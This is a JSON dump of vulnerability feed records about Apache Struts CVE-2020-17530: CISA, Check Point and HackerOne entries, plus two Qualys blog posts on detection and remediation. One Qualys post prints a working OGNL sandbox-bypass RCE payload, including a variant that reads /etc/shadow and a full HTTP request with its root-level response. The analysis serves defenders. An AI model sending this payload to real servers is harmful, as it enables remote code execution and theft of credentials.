"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, 
"impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Apache Struts Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-17530", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2023-07-06T15:38:35", "bounty": 0.0, "description": "CVE-2020-11738 on blog.skillfactory.ru", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-28T15:57:54", "type": "hackerone", "title": "Mail.ru: \"blog.skillfactory.ru\" Vulnerable to Directory Traversal ", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11738"], "modified": "2021-04-06T12:40:10", "id": "H1:1021010", "href": "https://hackerone.com/reports/1021010", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cisa": [{"lastseen": "2021-02-24T18:06:33", "description": "The Apache Software Foundation has released a security update to address a vulnerability in Apache Struts versions 2.0.0 to 2.5.25. A remote attacker could exploit this vulnerability to take control of an affected system.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Apache Security Bulletin [S2-061](<https://cwiki.apache.org/confluence/display/WW/S2-061>) and Apache security advisory for [CVE-2020-17530](<http://mail-archives.us.apache.org/mod_mbox/www-announce/202012.mbox/%3CCAMopvkO3Bba_4GQ-%3D8jngryMSxDkzo2JbrCrCApEt1aQ4fRCQw%40mail.gmail.com%3E>) and apply the necessary update or workaround.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/12/08/apache-releases-security-update-apache-struts-2>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T00:00:00", "type": "cisa", "title": "Apache Releases Security Update for Apache 
Struts 2", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2020-12-08T00:00:00", "id": "CISA:C17258C519A149D638B0BCF35898ABEE", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/12/08/apache-releases-security-update-apache-struts-2", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-24T18:06:45", "description": "The Apache Software Foundation has released a security advisory to address vulnerabilities in Struts in the version range 2.0.0\u20142.5.20. An attacker could exploit one of these vulnerabilities to take control of an affected system. 
The current version, Struts 2.5.22, is not affected.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Apache\u2019s security advisory for [CVE-2019-0230 and CVE-2019-0233](<http://mail-archives.us.apache.org/mod_mbox/www-announce/202008.mbox/%3C66006167-999e-a1e5-4a3a-5f1c75a1e8a2%40apache.org%3E>) and upgrade to the appropriate version.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/08/14/apache-releases-security-advisory-struts-2>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-14T00:00:00", "type": "cisa", "title": "Apache Releases Security Advisory for Struts 2", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-08-14T00:00:00", "id": 
"CISA:3D9E69A26C68866B64ED6E4B31E270E6", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/08/14/apache-releases-security-advisory-struts-2", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:36:00", "description": "A remote code execution vulnerability exists in Apache Struts. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-21T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts Remote Code Execution (CVE-2020-17530)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2020-12-21T00:00:00", "id": "CPAI-2020-1331", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2021-09-21T15:04:33", "description": "A vulnerability (CVE-2020-17530) discovered last year in the Object Graph Navigation Language (OGNL) evaluation function of Apache Struts versions 2.0.0 \u2013 2.5.25 can be exploited by 
attackers to perform remote code execution. This RCE vulnerability doesn\u2019t come packaged with Apache struts but is dependent on how the web application is configured, so a simple Apache version check cannot identify vulnerable systems.\n\n[Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) has added a new QID to detect this vulnerability that sends a request to the target server to determine if it is exploitable. Once detected, the vulnerability can be remediated by upgrading to Apache Struts 2.5.26 or greater, which checks if expression evaluation won't lead to the double evaluation to prevent exploitation. Qualys also advises to avoid using forced OGNL evaluation on untrusted user input.\n\n### About CVE-2020-17530\n\nApache Struts 2 is a well-known open-source web application framework for developing Java EE web applications that is widely targeted by hackers.\n\nAccording to CVE-2020-17530, Struts versions 2.0.0 - 2.2.25 are vulnerable to this exploit.\n\nThis vulnerability occurs when Apache Struts framework is forced to perform double evaluation of attributes assigned to some tag\u2019s attributes such as `id` if a developer has configured the application to perform forced OGNL evaluation using `%{..}` syntax.\n\nDouble evaluation is when an expression string gets evaluated as code, and then, if the result is another string, it gets evaluated as code again, the `%{..}` syntax indicates the content inside it should be treated as an OGNL expression.\n\n#### Example:\n \n \n <s: hidden name id=\"%{name}\"/>\n\nWhen a user passes a value `name=%{2*2}` the input is treated as OGNL script and is evaluated again generating output id="4\u2033, resulting in RCE.\n\nHence the user input value ends up getting evaluated twice when the tag\u2019s attributes are rendered.\n\n### Exploit Analysis\n\nBefore going forward with the exploitation, let\u2019s break the exploit to understand its core concept.\n\nFirst let\u2019s see what is 
[OGNL](<https://struts.apache.org/tag-developers/ognl>)? Object-Graph Navigation Language (OGNL) is an open-source Expression Language for Java, which, while using simpler expressions than the full range of those supported by the Java language, allows getting and setting properties, and execution of methods of Java classes.\n\nBeing able to create properties and change the code execution, it\u2019s prone to critical security flaws.\n\nWhile S2-061 exploit is basically a bypass of S2-059 sandbox environment, The sandbox restrictions imposed by OGNL enforces the validation of accessing packages, classes, and their normally private or protected methods/fields.\n\nThese private class and methods can be accessed and modified by creating a BeanMap instance.\n\n### RCE Code Analysis:\n \n \n %{(#instancemanager=#application[\"org.apache.tomcat.InstanceManager\"]).(#stack=#attr[\"com.opensymphony.xwork2.util.ValueStack.ValueStack\"]).(#bean=#instancemanager.newInstance(\"org.apache.commons.collections.BeanMap\")).(#bean.setBean(#stack)).(#context=#bean.get(\"context\")).(#bean.setBean(#context)).(#macc=#bean.get(\"memberAccess\")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\"java.util.HashSet\")).(#bean.put(\"excludedClasses\",#emptyset)).(#bean.put(\"excludedPackageNames\",#emptyset)).(#arglist=#instancemanager.newInstance(\"java.util.ArrayList\")).(#arglist.add(\"cat /etc/shadow\")).(#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute\")).(#execute.exec(#arglist))}\n \n\nApache Struts 2 contains internal security manager which blocks access to particular classes and Java packages - it\u2019s an OGNL-wide mechanism which means it affects any aspect of the [framework](<https://struts.apache.org/security/>).\n\nBelow are the three options that can be used to configure excluded packages and classes\n\n * struts.excludedClasses\n * struts.excludedPackageNamePatterns\n * struts.excludedPackageNames\n\nAnalyzing the first part of the 
exploit code we understand a [BeanMap](<https://commons.apache.org/proper/commons-beanutils/apidocs/org/apache/commons/beanutils/BeanMap.html>) instance is created and its `setBean` and `put` functions is used to set security mechanism options `excludedClasses` and `excludedPackageNames` to empty, these options contain the set of excluded classes and package names, thus nullifying the sandbox restrictions as every class and package access restrictions are now disabled.\n\nNow that the OGNL restrictions are completely disabled, In the later part of the code we can see code execution is achieved by using disallowed class `Execute` from [`freemarker.template.utility`](<https://freemarker.apache.org/docs/api/freemarker/template/utility/package-summary.html>) package, this `Execute` class allows `FreeMarker` the ability to execute external commands using `exec()` method.\n\n### Exploitation\n\nAttackers can execute system commands by sending the specially crafted HTTP request containing the OGNL payload to the target server like below:\n\nRequest:\n \n \n POST /index.action HTTP/1.1\n Host: 127.0.0.1:8080\n User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\n Accept-Encoding: gzip, deflate\n Connection: close\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 775\n \n 
id=%25{(%23instancemanager%3d%23application[\"org.apache.tomcat.InstanceManager\"]).(%23stack%3d%23attr[\"com.opensymphony.xwork2.util.ValueStack.ValueStack\"]).(%23bean%3d%23instancemanager.newInstance(\"org.apache.commons.collections.BeanMap\")).(%23bean.setBean(%23stack)).(%23context%3d%23bean.get(\"context\")).(%23bean.setBean(%23context)).(%23macc%3d%23bean.get(\"memberAccess\")).(%23bean.setBean(%23macc)).(%23emptyset%3d%23instancemanager.newInstance(\"java.util.HashSet\")).(%23bean.put(\"excludedClasses\",%23emptyset)).(%23bean.put(\"excludedPackageNames\",%23emptyset)).(%23arglist%3d%23instancemanager.newInstance(\"java.util.ArrayList\")).(%23arglist.add(\"id\")).(%23execute%3d%23instancemanager.newInstance(\"freemarker.template.utility.Execute\")).(%23execute.exec(%23arglist))}\n\nResponse:\n \n \n HTTP/1.1 200 OK\n Connection: close\n Date: Tue, 24 Aug 2021 13:02:26 GMT\n Content-Language: en\n Content-Type: text/html;charset=utf-8\n Set-Cookie: JSESSIONID=node011cf0u95rdhdp1xsd64hecky246.node0; Path=/\n Expires: Thu, 01 Jan 1970 00:00:00 GMT\n Content-Length: 974\n Server: Jetty(9.4.31.v20200723)\n \n \n <html>\n <head>\n <title>S2-059 demo</title>\n </head>\n <body>\n <a id=\"uid=0(root) gid=0(root) groups=0(root)\" href=\"/index.action;jsessionid=node011cf0u95rdhdp1xsd64hecky246.node0\">\n your input id: 
%{(#instancemanager=#application[\"org.apache.tomcat.InstanceManager\"]).(#stack=#attr[\"com.opensymphony.xwork2.util.ValueStack.ValueStack\"]).(#bean=#instancemanager.newInstance(\"org.apache.commons.collections.BeanMap\")).(#bean.setBean(#stack)).(#context=#bean.get(\"context\")).(#bean.setBean(#context)).(#macc=#bean.get(\"memberAccess\")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\"java.util.HashSet\")).(#bean.put(\"excludedClasses\",#emptyset)).(#bean.put(\"excludedPackageNames\",#emptyset)).(#arglist=#instancemanager.newInstance(\"java.util.ArrayList\")).(#arglist.add(\"id\")).(#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute\")).(#execute.exec(#arglist))}\n has ben evaluated again in id attribute\n </a>\n </body>\n </html>\n\n### Detecting the Vulnerability with Qualys WAS\n\nCustomers can detect this vulnerability with Qualys Web Application Scanning using **QID 150354**. Since this vulnerability is application configuration dependent, the QID sends a POST/GET request to the target server with OGNL RCE payload to confirm if the target is exploitable.\n\n\n\n### Report\n\nOnce the vulnerability is successfully detected by Qualys WAS, users shall see similar kind of results in the vulnerability scan report:\n\n\n\n### Solution\n\nAlthough this RCE vulnerability was discovered late last year, it\u2019s been seen in the wild and multiple exploit scripts are still being released.\n\nHence, we highly recommend upgrading to Apache Struts 2.5.26 or greater.\n\n### Credits\n\nApache Struts announcement was released on December 08, 2020: <https://struts.apache.org/announce-2020#a20201208>\n\nApache Security Bulletin:\n\n * <https://cwiki.apache.org/confluence/display/WW/S2-061>\n\nCVE details:\n\n * <https://nvd.nist.gov/vuln/detail/CVE-2020-17530>\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17530>\n\nCredits for the vulnerability discovery goes to:\n\n * Alvaro Munoz - pwntester at github dot com\n * 
Masato Anzai of Aeye Security Lab, inc\n\nReferences:\n\n * <https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2/>\n * <https://struts.apache.org/security/#do-not-use-incoming-untrusted-user-input-in-forced-expression-evaluation>\n * <https://securitylab.github.com/research/apache-struts-double-evaluation/>\n * <https://www.rapid7.com/db/modules/exploit/multi/http/struts2_multi_eval_ognl/>\n * <https://github.com/ka1n4t/CVE-2020-17530>\n\n### Contributors\n\n * **Sheela Sarva**, Director, Quality Engineering, Web Application Security, Qualys\n * **Ed Arnold**, Security Solutions Architect, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-21T14:40:00", "type": "qualysblog", "title": "Apache Struts 2 Double OGNL Evaluation Vulnerability (CVE-2020-17530)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2021-09-21T14:40:00", "id": "QUALYSBLOG:FE0BAF7268104D525CC0A2ABC0471C4C", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. 
This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. 
Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. 
The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-10
20`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149
`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? 
